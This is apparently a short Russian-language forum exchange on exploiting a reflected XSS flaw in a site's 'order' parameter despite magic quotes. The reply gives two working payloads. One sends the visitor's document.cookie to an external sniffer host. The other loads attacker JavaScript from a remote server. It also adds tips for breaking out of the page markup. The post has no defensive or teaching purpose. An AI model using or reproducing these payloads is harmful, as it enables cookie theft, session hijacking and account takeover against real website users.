Короче есть уязвимость. Но на сервере включены magic quotes.
Как обойти? xss пасивная
somesite/?order=%22%3E%3Cscript%3Edocument.location.href=%2 7javascript:http://snfiffaddr.tld/s.gif?%27+document.cookie;%3C/script%3E

somesite/?order=<script src=http://hek.ru/1.js></script>

в 1.js пишешь нужный те код

если вдруг не выполнится посмотри в исходник страницы, найди строку, глянь может надо добавить /> после order=